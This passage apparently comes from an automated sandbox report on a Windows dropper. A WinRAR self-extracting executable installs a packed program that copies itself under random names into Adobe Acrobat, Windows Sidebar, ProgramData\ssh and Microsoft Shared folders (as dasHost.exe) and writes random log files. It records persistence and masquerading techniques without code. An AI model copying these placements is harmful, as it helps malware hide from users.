                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exeJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\dd5be8a07a6153Jump to behavior
                                    Source: ZZ2sTsJFrt.exeStatic file information: File size 2330001 > 1048576
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: ZZ2sTsJFrt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ZZ2sTsJFrt.exe
                                    Source: ZZ2sTsJFrt.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: ZZ2sTsJFrt.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: ZZ2sTsJFrt.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: ZZ2sTsJFrt.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: ZZ2sTsJFrt.exe, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe, File created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\__tmp_rar_sfx_access_check_3992140
                                    Source: ZZ2sTsJFrt.exe, Static PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe, Code function: 0_2_00F1F640 push ecx; ret 0_2_00F1F653
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe, Code function: 0_2_00F1EB78 push eax; ret 0_2_00F1EB96
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Code function: 4_2_00007FFD9BAA00BD pushad ; iretd 4_2_00007FFD9BAA00C1
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Code function: 4_2_00007FFD9BC07568 push edx; retf 4_2_00007FFD9BC0756B
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Code function: 4_2_00007FFD9BC05D02 push es; iretd 4_2_00007FFD9BC05D07
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Code function: 4_2_00007FFD9BEA68B3 push esp; ret 4_2_00007FFD9BEA68B9
                                    Source: HyperPortContainerproviderinto.exe.0.dr, Static PE information: section name: .text entropy: 7.564500355462243
                                    Source: AaHCyFZRuOMjGDqdgJ.exe.4.dr, Static PE information: section name: .text entropy: 7.564500355462243
                                    Source: dasHost.exe.4.dr, Static PE information: section name: .text entropy: 7.564500355462243
                                    Source: AaHCyFZRuOMjGDqdgJ.exe0.4.dr, Static PE information: section name: .text entropy: 7.564500355462243
                                    Source: AaHCyFZRuOMjGDqdgJ.exe1.4.dr, Static PE information: section name: .text entropy: 7.564500355462243
                                    Source: AaHCyFZRuOMjGDqdgJ.exe2.4.dr, Static PE information: section name: .text entropy: 7.564500355462243

                                    Persistence and Installation Behavior

                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\Users\user\Desktop\kCewxyIz.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\Users\user\Desktop\KRFbuSND.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\Users\user\Desktop\kKNOcijE.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, File created: C:\Users\user\Desktop\VVwrSJqk.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, File created: C:\Users\user\Desktop\kwtgfRAG.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, File created: C:\Users\user\Desktop\iczfvMBI.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, File created: C:\Users\user\Desktop\ufMwPuFo.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, File created: C:\Users\user\Desktop\AXpVrZKc.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\ProgramData\ssh\AaHCyFZRuOMjGDqdgJ.exe
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\Users\Default\Pictures\AaHCyFZRuOMjGDqdgJ.exe
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\Users\user\Desktop\EZcCRmIO.log
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, File created: C:\Users\user\Desktop\MjEjEgzx.log
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe, File created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\Users\user\Desktop\cYVGOFtR.log
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, File created: C:\Users\user\Desktop\vqImhKDh.log

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
